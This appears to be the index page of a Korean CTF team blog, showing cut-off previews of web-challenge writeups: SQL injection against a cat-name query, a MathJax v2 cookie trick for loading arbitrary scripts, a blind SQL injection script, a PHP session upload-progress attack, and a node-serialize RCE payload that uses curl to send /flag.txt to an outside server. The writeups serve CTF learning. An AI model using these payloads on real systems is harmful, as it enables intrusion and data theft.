주말에 ctf를 하는데 문제를 풀면서 굉장히 이상한 걸 발견했다. /* cakectf my-nyamber */ async function queryNekoByName(neko_name, callback) { let filter = /(\'|\\|\s)/g; let result = []; if (typeof neko_name === 'string') { /* Process single query */ if (filter.exec(neko_name) === null) { try { let row = await querySqlStatement( `SELECT * FROM neko WHERE name='${neko_name}'` ); if (row) result.push(row); } catch { } } } ..
mathjax v2 에서는 cookie에 config 값들을 저장할 수 있다. cookie에 저장된 config에는 mjx라는 prefix가 붙게 되는데 mjx.menu 설정을 보면 output format을 지정해주는 옵션이 있다. cookie에 다음 값이 있으면 mathjax는 해당 버전의 output/svg/config.js를 불러오고 불러온 javascript를 토대로 output을 생성한다. mjx.menu=renderer:svg 또한 cookie값을 기준으로 script를 불러올 때 굉장히 신기한 동작을 확인할 수 있었는데 svg대신 ../../../../../../../a#를 넣으면 아래와 같이 요청을 보낸다. 이를 통해 우리는 jsdelivr에 있는 임의의 script를 맘대로 import..
들어가면 파라미터 2개가 있는데 두개 파라미터 모두에서 sql injection이 터진다. order by뒤에서 터지는 건데 그냥 subquery로 행 여러개 리턴해서 500 error내는걸로 blind sql injection해주면 된다. import requests import sys from urllib.parse import quote import string #string = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@-_$%^{}." url = 'http://poxecenter.sstf.site:31888/demo/getGochaList?sortName=full_name&sortFlag=desc,' data..
https://gist.github.com/as3617/fa06307b5c1bcc002e3b646bfcc3500d exploit code IJCTF 2021 - memory writeup IJCTF 2021 - memory writeup. GitHub Gist: instantly share code, notes, and snippets. gist.github.com disabled_functions are except putenv, mail clean_up option for session is off When the UPLOAD_PROGRESS meets clean_up option as off that session file will have the path for the uploaded file. ..
Description http://111.186.59.2:50080 http://111.186.59.2:50081 http://111.186.59.2:50082 The three servers are the same, you can choose any one. server will be reset every 10 minutes. this chall is almost same https://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html.
보호되어 있는 글입니다.
Only Exploit Code.. sparta - node-serialize rce # https://www.exploit-db.com/exploits/49552 import requests import re import base64 import sys url = 'http://web.zh3r0.cf:6666/guest' # change this payload = """function(){require('child_process').exec('curl -F file1=@/flag.txt server:1234',function(error, stdout, stderr){return stdout;});}()""" # rce = "_$$ND_FUNC$$_process.exit(0)" # code ="_$$ND..
Team Alpray